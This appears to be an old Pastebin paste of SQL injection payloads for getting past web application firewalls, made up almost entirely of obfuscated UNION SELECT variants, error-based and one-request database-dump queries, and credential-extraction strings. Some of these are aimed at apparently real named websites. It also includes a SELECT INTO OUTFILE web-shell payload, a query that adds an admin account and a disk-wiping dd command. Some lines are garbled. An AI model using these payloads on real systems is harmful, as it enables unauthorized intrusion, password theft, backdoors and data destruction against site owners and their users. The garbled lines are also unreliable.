API tools faq
paste
Advertisement
Guest User

SQLi Waf Bypass Codes

a guest
Nov 28th, 2014
1,321
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 32.75 KB | None | 0 0
raw download clone embed print report
  1. SQLI Injction WAF Bypass Methods With Details
  2.  
  3.  
  4. --'- : +--+ / : -- - : --+- : /*
  5. ) order by 1-- -
  6. ') order by 1-- -
  7. ')order by 1%23%23
  8. %')order by 1%23%23
  9. Null' order by 100--+
  10. Null' order by 9999--+
  11. ')group by 99-- -
  12. 'group by 119449-- -
  13. 'group/**/by/**/99%23%23
  14. union select ByPassing method
  15. +union+distinct+select+
  16. +union+distinctROW+select+
  17. /**//*!12345UNION SELECT*//**/
  18. /**//*!50000UNION SELECT*//**/
  19. +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  20. +/*!u%6eion*/+/*!se%6cect*/+
  21. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  22. 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
  23. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  24. union /*!50000%53elect*/
  25. %55nion %53elect
  26. +--+Union+--+Select+--+
  27. +UnIoN/*&a=*/SeLeCT/*&a=*/
  28. id=1+’UnI”On’+'SeL”ECT’
  29. id=1+'UnI'||'on'+SeLeCT'
  30. UnIoN SeLeCt CoNcAt(version())--
  31. uNiOn aLl sElEcT
  32. uUNIONnion all sSELECTelect
  33. ================================================================================​===================================================
  34. :: Buffer Overflow ::
  35. ================================================================================​===================================================
  36. +And(select 1)=(select 0×414)+union+select+1–
  37. +And(select 1)=(select 0xAAAA)+union+select+1–
  38. +And(select
  39. 1)=(select
  40. 0×4141414141414141414141414141414141414141414141414141414141414141414141414
  41.  
  42. 14141414141414141414141414141414141414141414141414141414141414141414141414141414​
  43.  
  44. 14141414141414141414141414141414141414141414141414141414141414141414141414141414​
  45.  
  46. 14141414141414141414141414141414141414141414141414141414141414141414141414141414​
  47.  
  48. 14141414141414141414141414141414141414141414141414141414141414141414141414141414​
  49.  
  50. 14141414141414141414141414141414141414141414141414141414141414141414141414141414​
  51.  
  52. 14141414141414141414141414141414141414141414141414141414141414141414141414141414​
  53.  
  54. 14141414141414141414141414141414141414141414141414141414141414141414141414141414​
  55.  
  56. 14141414141414141414141414141414141414141414141414141414141414141414141414141414​
  57. 1414141)+
  58. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  59. ================================================================================​==================================================
  60. :: 400 Bad Request ::
  61. ================================================================================​==================================================
  62. –+%0A
  63. union+select+1–+%0A,2–+%0A,3–+%0A,4–+%0A,5–+%0A –
  64. ================================================================================​==================================================
  65. null the parameter
  66. ================================================================================​==================================================
  67. id=-1
  68. id=null
  69. id=1+and+false+
  70. id=9999
  71. id=1 and 0
  72. id==1
  73. id=(-1)
  74. ================================================================================​=======================================================
  75. Group_Concat
  76. ================================================================================​=======================================================
  77. Group_Concat
  78. group_concat()
  79. /*!group_concat*/()
  80. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  81. group_concat(,0x3c62723e)
  82. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29
  83. CoNcAt()
  84. CONCAT(DISTINCT Version())
  85. concat(,0x3a,)
  86. concat%00()
  87. %00CoNcAt()
  88. /*!50000cOnCat*/(/*!Version()*/)
  89. /*!50000cOnCat*/
  90. /**//*!12345cOnCat*/(,0x3a,)
  91. concat_ws()
  92. concat(0x3a,,0x3c62723e)
  93. /*!concat_ws(0x3a,)*/
  94. concat_ws(0x3a3a3a,version()
  95. CONCAT_WS(CHAR(32,58,32),version(),)
  96. REVERSE(tacnoc)
  97. binary(version())
  98. uncompress(compress(version()))
  99. aes_decrypt(aes_encrypt(version(),1),1)
  100. ================================================================================​====================================================
  101. To appear column numbr in page put after id
  102. ================================================================================​====================================================
  103. id=1+and+1=0+union+select+1,2,3,4,5,6
  104. +AND+1=0
  105. /*!aND*/ 1 like 0
  106. +/*!and*/+1=0
  107. +and+2>3+
  108. +and(1)=(0)
  109. and (1)!=(0)
  110. +div+0
  111. Having+1=0
  112. ================================================================================​===================================================
  113. function ByPassing
  114. ================================================================================​===================================================
  115. unhex(hex(value))
  116. cast(value as char)
  117. uncompress(compress(version()))
  118. cast(version() as char)
  119. aes_decrypt(aes_encrypt(version(),1),1)
  120. binary(version())
  121. convert(value using ascii)
  122. ================================================================================​===================================================
  123. avoid source page injection
  124. ================================================================================​===================================================
  125. concat(?”>,
  126. ,@@version,?
  127. “>
  128. ?
  129. injection
  130. concat(0x223e,@@version)
  131. concat(0x273e27,version(),0x3c212d2d)
  132. concat(0x223e3c62723e,version(),0x3c696d67207372633d22)
  133. concat(0x223e,@@version,0x3c696d67207372633d22)
  134. concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62​723e)
  135. concat(0x223e3c62723e,@@version,0x3a,”BlackRose”,0x3c696d67207372633d22)
  136. concat(‘’,@@version,’’)
  137. concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27)
  138. concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)
  139. ================================================================================​===================================================
  140. get version – DB_NAME – user – HOST_NAME – datadir
  141. ================================================================================​===================================================
  142. version()
  143. convert(version() using latin1)
  144. unhex(hex(version()))
  145. @@GLOBAL.VERSION
  146. (substr(@@version,1,1)=5) :: 1 true 0 fals
  147. # like #
  148. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 –
  149. ================================================================================​==================================================
  150. +and substring(version(),1,1)=4
  151. +and substring(version(),1,1)=5
  152. +and substring(version(),1,1)=9
  153. +and substring(version(),1,1)=10
  154. id=1 /*!50094aaaa*/ error
  155. id=1 /*!50095aaaa*/ no error
  156. id=1 /*!50096aaaa*/ error
  157. # like # http://www.marinaplast.com/page.php?id=13 /*!50095aaaa*/
  158. id=1 /*!40123 1=1*/–+- no error
  159. id=1 /*!40122rrrr*/ no error
  160. # like # http://www.marinaplast.com/page.php?id=13 /*!40122rrrr*/ error not v4
  161. ================================================================================​=================================================
  162. DB_NAME()
  163. ================================================================================​=================================================
  164. @@database
  165. database()
  166. id=vv()
  167. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,DB_NAME(),4,5 –
  168. http://www.marinaplast.com/page.php?id=vv()
  169. @@user
  170. user()
  171. user_name()
  172. system_user()
  173. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,user(),4,5 –
  174. HOST_NAME()
  175. @@hostname
  176. @@servername
  177. SERVERPROPERTY()
  178. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,HOST_NAME(),4,5 –
  179. @@datadir
  180. datadir()
  181. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,datadir(),4,5 –
  182. ASPX
  183. and 1=0/@@version
  184. ‘ and 1=0/@@version;–
  185. ‘) and 1=@@version–
  186. and 1=0/user;–
  187. Requested method
  188. [DUMP DB in 1 Request]
  189. (select
  190. (@) from (select(@:=0×00),(select (@) from (information_schema.columns)
  191. where (table_schema>=@) and (@)in (@:=concat(@,0x0a,’ [
  192. ',table_schema,' ] >’,table_name,’ > ‘,column_name))))x)
  193. (select(@) from (select (@:=0×00),(select (@) from (table) where (@) in (@:=concat(@,0x0a,column1,0x3a,column2))))a)
  194. ================================================================================​===================================================
  195. [DUMP DB in 1 Request improve]
  196. ================================================================================​===================================================
  197. (select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)where​(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=concat(@x,​0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)
  198. like
  199. http://www.marinaplast.com/page.php?id=-13
  200. union select
  201. 1,2,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.colu
  202.  
  203. mns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=c​
  204.  
  205. oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5
  207. ================================================================================​===================================================
  208. #2#
  209. ================================================================================​===================================================
  210. method like DUMP DB in 1 Request
  211. ================================================================================​===================================================
  212. concat(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT(
  213. @o,0xd0a,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM
  214. information_schema.tables WHERE table_name>@i order by table_name
  215. LIMIT 1)))
  216. like
  217. http://www.mishnetorah.com/shop/details.php?id=-26+union+select+1,2,3,concat(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT(@o,0xd0a​
  218. ,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM
  219. information_schema.tables WHERE table_name>@i order by table_name
  220. LIMIT 1))),@o),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21
  221. ================================================================================​===================================================
  222. #3#
  223. ================================================================================​===================================================
  224. databases
  225. (select+count(schema_name) +from+information_schema.schemata)
  226. # like #
  227. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(schema_name) +from+information_schema.schemata),4,5 –
  228. tables
  229. (select+count(table_name) +from+information_schema.tables)
  230. # like #
  231. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(table_name) +from+information_schema.tables),4,5 –
  232. columns
  233. (select+count(column_name) +from+information_schema.columns)
  234. # like #
  235. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(column_name) +from+information_schema.columns),4,5 –
  236. ================================================================================​===================================================
  237. #4#
  238. ================================================================================​===================================================
  239. show the table with all her columns
  240. CONCAT(table_name,0x3e,GROUP_CONCAT(column_name))
  241. +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 1,1–+
  242. like
  243. http://www.marinaplast.com/page.php?id=-13
  244. union select 1,2,CONCAT(table_name,0x3e,GROUP_CONCAT(column_name)),4,5
  245. +FROM information_schema.columns WHERE table_schema=database() GROUP BY
  246. table_name LIMIT 0,1–+
  247. ================================================================================​===================================================
  248. #5#WWWWWWWWWWWAAAAAAAAAAAAAAAAAAFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
  249. ================================================================================​===================================================
  250. feltered requested
  251. # tables #
  252. group_concat(/*!table_name*/)
  253. +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES– -
  254. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()– -
  255. /*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()– -
  256. ================================================================================​===================================================
  257. # columns #
  258. ================================================================================​===================================================
  259. group_concat(/*!column_name*/)
  260. +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table
  261. /*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  262. /*!froM*/ table– -
  263. ================================================================================​===================================================
  264. #6#
  265. ================================================================================​===================================================
  266. bypass method
  267. (select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA())
  268. (select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table)
  269. like
  270. http://www.marinaplast.com/page.php?id=-13
  271. union select
  272. 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5
  274. ================================================================================​===================================================
  275. #7#
  276. ================================================================================​===================================================
  277. bypass method
  278. unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
  279. /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)
  280. like
  281. http://www.marinaplast.com/page.php?id=-13
  282. union select
  283. 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5
  284.  
  285. /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)–
  286. ================================================================================​===================================================
  287. [+] Union Select:
  288. ================================================================================​===================================================
  289. union /*!select*/+
  290. union/**/select/**/
  291. /**/union/**/select/**/
  292. /**/union/*!50000select*/
  293. /**//*!12345UNION SELECT*//**/
  294. /**//*!50000UNION SELECT*//**/
  295. /**/uniUNIONon/**/selSELECTect/**/
  296. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  297. /**//*!union*//**//*!select*//**/
  298. /**/UNunionION/**/SELselectECT/**/
  299. /**//*UnIOn*//**//*SEleCt*//**/
  300. /**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  301. /**/UNunionION/**/all/**/SELselectECT/**/
  302. /**//*UnIOn*//**/all/**//*SEleCt*//**/
  303. /**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  304. uni
  305. %20union%20/*!select*/%20
  306. union%23aa%0Aselect
  307. union+distinct+select+
  308. union+distinctROW+select+
  309. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  310. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  311. %23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
  312. /*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  313. /*!u%6eion*/+/*!se%6cect*/+
  314. 1%’)and(0)union(select(1),version(),3,4,5,6)%23%23%23
  315. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  316. union /*!50000%53elect*/
  317. +%2F**/+Union/*!select*/
  318. %55nion %53elect
  319. +–+Union+–+Select+–+
  320. +UnIoN/*&a=*/SeLeCT/*&a=*/
  321. uNiOn aLl sElEcT
  322. uUNIONnion all sSELECTelect
  323. union(select(1),2,3)
  324. union (select 1111,2222,3333)
  325. union (/*!/**/ SeleCT */ 11)
  326. %0A%09UNION%0CSELECT%10NULL%
  327. /*!union*//*–*//*!all*//*–*//*!select*/
  328. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  329. union+sel%0bect
  330. +uni*on+sel*ect+
  331. +#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a
  332. union(select (1),(2),(3),(4),(5))
  333. UNION(SELECT(column)FROM(table))
  334. id=1+’UnI”On’+’SeL”ECT’
  335. id=1+’UnI’||’on’+SeLeCT’
  336. union select 1–+%0A,2–+%0A,3–+%0A etc ….
  337. ================================================================================​===================================================
  338. [+] Buffer overflow:
  339. ================================================================================​===================================================
  340. +And(select 1)=(select 0×414)+union+select+1–
  341. +And(select 1)=(select 0xAAAA)+union+select+1–
  342. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  343. +and (/*!select*/ 1)=(/*!select*/ 0×414)+
  344. +And(select
  345. 1)=(select
  346. 0×4141414141414141414141414141414141414141414141414141414141414141414141414?1414​
  347.  
  348. 14141414141414141414141414141414141414141414141414141414141414141414141414141414​
  349.  
  350. 1414141414141414141414141414141414141414141414141414141414141414141414141414?141​
  351.  
  352. 41414141414141414141414141414141414141414141414141414141414141414141414141414141​
  353.  
  354. 41414141414141414141414141414141414141414141414141414141414141414141414141414141​
  355.  
  356. 41414141414141414141414141414141414141414141414141414141414141414141414141414141​
  357.  
  358. 41414141414141414141414141414141414141414141414141414141414141414141414141414141​
  359.  
  360. 41414141414141414141414141414141414141414141414141414141414141414141414141414141​
  361.  
  362. 41414141414141414141414141414141414141414141414141414141414141414141414141414141​
  363. 4141)+
  364. ================================================================================​===================================================
  365. [+] Group Concat:
  366. ================================================================================​===================================================
  367. Group_Concat
  368. group_concat()
  369. /*!group_concat*/()
  370. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  371. group_concat(,0x3c62723e)
  372. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22testtest%22%29
  373. CoNcAt()
  374. CONCAT(DISTINCT Version())
  375. concat(,0x3a,)
  376. concat%00()
  377. %00CoNcAt()
  378. /*!50000cOnCat*/(/*!Version()*/)
  379. /*!50000cOnCat*/
  380. /**//*!12345cOnCat*/(,0x3a,)
  381. concat_ws()
  382. concat(0x3a,,0x3c62723e)
  383. /*!concat_ws(0x3a,)*/
  384. concat_ws(0x3a3a3a,version()
  385. CONCAT_WS(CHAR(32,58,32),version(),)
  386. ================================================================================​===================================================
  387. ERORE BASED
  388. ================================================================================​===================================================
  389. =21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1–
  390. Database
  391. 21
  392. and (select 1 from (select count(*),concat((select(select
  393. concat(cast(database() as char),0x7e)) from information_schema.tables
  394. where table_schema=database() limit 0,1),floor(rand(0)*2))x from
  395. information_schema.tables group by x)a)
  396. Table_name
  397. and
  398. (select 1 from (select count(*),concat((select(select
  399. concat(cast(table_name as char),0x7e)) from information_schema.tables
  400. where table_schema=database() limit 19,1),floor(rand(0)*2))x from
  401. information_schema.tables group by x)a)
  402. Columns
  403. 21
  404. and (select 1 from (select count(*),concat((select(select
  405. concat(cast(column_name as char),0x7e)) from information_schema.columns
  406. where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from
  407. information_schema.tables group by x)a)
  408. extract date
  409. http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21
  410. and (select 1 from (select count(*),concat((select(select
  411. concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from
  412. iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from
  413. information_schema.tables group by x)a)
  414. Notice the limit function in the query
  415. A website can have more than 2 two databases, so increase the limit until you find all database names
  416. Example: limit 0,1 or limit 1,1 or limit 2,1
  417. ================================================================================​===================================================
  418. Differences:
  419. Error Based Query for Database Extraction:
  420. ================================================================================​===================================================
  421. and
  422. (select 1 from (select count(*),concat((select(select
  423. concat(cast(database() as char),0x7e)) from information_schema.tables
  424. where table_schema=database() limit 0,1),floor(rand(0)*2))x from
  425. information_schema.tables group by x)a)
  426. Double Query for Database Extraction:
  427. and(select
  428. 1 from(select count(*),concat((select (select
  429. concat(0x7e,0×27,cast(database() as char),0×27,0x7e)) from
  430. information_schema.tables limit 0,1),floor(rand(0)*2))x from
  431. information_schema.tables group by x)a) and 1=1
  432. and(select 1 from(select count(*),concat((select (select (SELECT distinct
  433. concat(0x7e,0×27,cast(schema_name as char),0×27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
  434. information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
  435. and(select 1 from(select count(*),concat((select (select (SELECT distinct
  436. concat(0x7e,0×27,cast(table_name as char),0×27,0x7e) FROM information_schema.tables Where
  437. table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
  438. information_schema.tables group by x)a) and 1
  439. ================================================================================​===================================================
  440. WUBI +and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from​+iw_users+limit+0,1)))–+
  441. ================================================================================​===================================================
  442. Descarci orice linux live, bootezi dupa el si formatezi cu dd+urandom. De acolo nu mai recupereaza NIMENI ceva.
  443. Code: dd if=/dev/urandom of=/dev/sda bs=1M
  444. I’d say using concat(0xY)
  445. Y being ‘’ in hex
  446. union select concat(version,0x3c7363726970743e616c6572742827706833776c27293c2f7363726970743e)​
  447. http://zerocoolhf.altervista.org/level2.php?id=-1%27%20union%20select%20*%20from%28%28select%201%29a%20join%20%28select%20versio​n%28%29%29b%20join%20%28select%20database%28%29%29c%29–+
  448. union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name=concat(’0x’, hex(‘users’)
  449. =113′+and+0+union+select+1,(SELECT
  450. (@) FROM (SELECT(@:=0×00),(SELECT (@) FROM (information_schema.columns)
  451. WHERE (table_schema>=@) AND (@)IN
  452. (@:=CONCAT(@,0x3C7363726970743E616C6572742827,’ [ ',table_schema,' ]
  453. >’,table_name,’ >
  454. ‘,column_name,0x27293B3C2F7363726970743E))))x),3–+–
  455. injection in sql database addd new user
  456. INSERT INTO admins (`name`,`password`,`email`) VALUES (‘unix’,'unixunix’,'unix_chro@yahoo.com’)
  457. +and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_nam​
  458.  
  459. e+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHE​
  460.  
  461. X+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  462. CHALLENGES
  463. Code:
  464. =(13)and(0)union(select(1),group_concat(column_name,0x3c62723e),(3)from(informat​ion_schema.columns)where(table_schema=database())and(table_name=0×73656375726974​79))–+-
  465. =12+and+false/*!union*/
  466.  
  467. /*!select*/1,group_concat(0x3c62723e,/*!TabLe_NaMe*/),2,concat(user(),0x2a,database(),0x2a,version()),13,0x3c666f6e7420636f6c6f723d6​26c75653e3c68323e706833776c,15
  468. from information_schema.tables where
  469. table_schema=0x66616272697a696f5f636572697070 LiMit 0,1–
  470. =/*!uNiOn*/ /*!SeLeCt*/ 1,concat(/*!version(),0x3a,0x3a,AdMinLoGiN,0x3a,0x3a*/),3 /*!fRoM*/ security–
  471. =121)+and(0)+/*!uNion*/+/*!seleCt*/+1,2,3,4,version(),6,7– -
  472. =121)/**/and false UNION(SELECT 1,2,3,4,5,6,7)–+-
  473. =121 div 0 ) /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,version()# |
  474. null’+union+select+1,2,count(schema_name),4,5+from+information_schema.schemata– x
  475. ================================================================================​===================================================
  476. Error Based:
  477. ================================================================================​===================================================
  478. +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1–
  479. or 1 group by concat(0x3a,(select substr(group_concat(username,0x3a,password),1,150)
  480. from rmdsz_user),floor(rand(0)*2)) having min(0) or 1– -
  481. or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 — -
  482. and
  483. (select 1 from (select count(*),concat((select(select
  484. concat(cast(database() as char),0x7e)) from information_schema.tables
  485. where table_schema=database() limit 0,1),floor(rand(0)*2))x from
  486. information_schema.tables group by x)a)
  487. +AND(SELECT
  488. COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by
  489. CONCAT((SELECT version() FROM information_schema.tables LIMIT
  490. 0,1),FLOOR(RAND(0)*2)))
  491. +and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+​
  492.  
  493. 3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_​
  494. schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)– x
  495. or 1=convert(int,(@@version))-
  496. +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1–
  497. +and+(select+1+from+(select+count(*),concat((select(select+concat(c
  498.  
  499. ast(count(schema_name)+as+char),0x7e))+from+information_schema.schemata+limit+0,​
  500. 1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  501. (42)and(0)union(select(1),2,version(),4,5,0x3c623e3c666f6e7420636f6c6f723d626c75​653e706833776c,7,8,9,(10))–+-
  502. ================================================================================​===================================================
  503. WAF BYPASS BY TOTTI
  504. ================================================================================​===================================================
  505. =-2/*1337*/UNION/*1337*/(SELECT/*1337*/1337,concat_ws(0x203a20,0x746f7474693933,table_nam
  506.  
  507. e)/*1337*/FROM/*1337*/INFORMATION_SCHEMA./*!TABLES*//*1337*/WHERE/*1337*/TABLE_SCHEMA=database())–
  508. -
  509. =2+and(0)+union+distinctROW+select+1,/*!50000CoNcaT*/(0x706833776c,0x3a,table_name)
  510. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/
  511. /*!TaBle_ScHEmA*/=database()– -
  512. ================================================================================​===================================================
  513. WUBI
  515. 1,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)whe​re(table_schema!=0×69)and(0×00)in(@x:=concat(@x,0x3c62723e,table_schema,0x202020​3d3e3e202020,table_name,0x20203a3a3a32020,column_name))))x),3,4–
  516. (select
  517. (@) from (select(@:=0×00),(select (@) from (information_schema.columns)
  518. where (table_schema>=@) and (@)in (@:=concat(@,0x0a,’ [
  519. ',table_schema,' ] >’,table_name,’ > ‘,column_name))))x)
  520. (select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)
  521. (select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)
  522. ================================================================================​===================================================
  523. +and+1=convert(int,SERVERPROPERTY(‘ProductVersion’))
  524. ================================================================================​===================================================
  525. http://zerofreak.blogspot.it/2012/02/tutorial-by-zer0freak-zer0freak-sqli.html
  526. http://www.websec.ca/kb/sql_injection
  527. http://www.hellboundhackers.org/articles/862-mysql-injection-complete-tutorial.html
  528. ================================================================================​===================================================
  529. test
  530. http://www.mt.ro/nou/articol.php?id=-angajari’+and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,passw​ord)+from+iw_users+limit+0,1)))–+
  531. …………………………………..
  532. http://www.mt.ro/nou/articol.php?id=-angajari’
  533. and (select 1 from (select count(*),concat((select(select
  534. concat(cast(table_name as char),0x7e)) from information_schema.tables
  535. where table_schema=0x64625f6d74 limit 10,1),floor(rand(0)*2))x from
  536. information_schema.tables group by x)a)–+
  537. SELECT “ system($_REQUEST['cmd']); ?>”
  538. INTO OUTFILE “full/path/here/cmd.php”
  539.  
  540.  
  541.  
  542.  
  543. ------------Best Bypass WAF------------
  544. ========================
  545. [~] order by [~]
  546. /**/ORDER/**/BY/**/
  547. /*!order*/+/*!by*/
  548. /*!ORDER BY*/
  549. /*!50000ORDER BY*/
  550. /*!50000ORDER*//**//*!50000BY*/
  551. /*!12345ORDER*/+/*!BY*/
  552. [~] UNION select [~]
  553. /*!00000Union*/ /*!00000Select*/
  554. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  555. %55nion %53elect
  556. %55nion(%53elect 1,2,3)-- -
  557. +union+distinct+select+
  558. +union+distinctROW+select+
  559. /**//*!12345UNION SELECT*//**/
  560. /**//*!50000UNION SELECT*//**/
  561. /**/UNION/**//*!50000SELECT*//**/
  562. /*!50000UniON SeLeCt*/
  563. union /*!50000%53elect*/
  564. + #?uNiOn + #?sEleCt
  565. + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
  566. /*!%55NiOn*/ /*!%53eLEct*/
  567. /*!u%6eion*/ /*!se%6cect*/
  568. +un/**/ion+se/**/lect
  569. uni%0bon+se%0blect
  570. %2f**%2funion%2f**%2fselect
  571. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  572. REVERSE(noinu)+REVERSE(tceles)
  573. /*--*/union/*--*/select/*--*/
  574. union (/*!/**/ SeleCT */ 1,2,3)
  575. /*!union*/+/*!select*/
  576. union+/*!select*/
  577. /**/union/**/select/**/
  578. /**/uNIon/**/sEleCt/**/
  579. +%2F**/+Union/*!select*/
  580. /**//*!union*//**//*!select*//**/
  581. /*!uNIOn*/ /*!SelECt*/
  582. +union+distinct+select+
  583. +union+distinctROW+select+
  584. uNiOn aLl sElEcT
  585. UNIunionON+SELselectECT
  586. /**/union/*!50000select*//**/
  587. 0%a0union%a0select%09
  588. %0Aunion%0Aselect%0A
  589. %55nion/**/%53elect
  590. uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  591. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  592. %0A%09UNION%0CSELECT%10NULL%
  593. /*!union*//*--*//*!all*//*--*//*!select*/
  594. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  595. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  596. +UnIoN/*&a=*/SeLeCT/*&a=*/
  597. union+sel%0bect
  598. +uni*on+sel*ect+
  599. +#1q%0Aunion all#qa%0A#%0Aselect
  600. union(select (1),(2),(3),(4),(5))
  601. UNION(SELECT(column)FROM(table))
  602. %23xyz%0AUnIOn%23xyz%0ASeLecT+
  603. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
  604. union(select(1),2,3)
  605. union (select 1111,2222,3333)
  606. uNioN (/*!/**/ SeleCT */ 11)
  607. union (select 1111,2222,3333)
  608. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  609. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  610. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  611. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  612. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  613. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  614. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  615. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  616. /union\sselect/g
  617. /union\s+select/i
  618. /*!UnIoN*/SeLeCT
  619. +UnIoN/*&a=*/SeLeCT/*&a=*/
  620. +uni>on+sel>ect+
  621. +(UnIoN)+(SelECT)+
  622. +(UnI)(oN)+(SeL)(EcT)
  623. +’UnI”On’+'SeL”ECT’
  624. +uni on+sel ect+
  625. +/*!UnIoN*/+/*!SeLeCt*/+
  626. /*!u%6eion*/ /*!se%6cect*/
  627. uni%20union%20/*!select*/%20
  628. union%23aa%0Aselect
  629. /**/union/*!50000select*/
  630. /^.*union.*$/ /^.*select.*$/
  631. /*union*/union/*select*/select+
  632. /*uni X on*/union/*sel X ect*/
  633. +un/**/ion+sel/**/ect+
  634. +UnIOn%0d%0aSeleCt%0d%0a
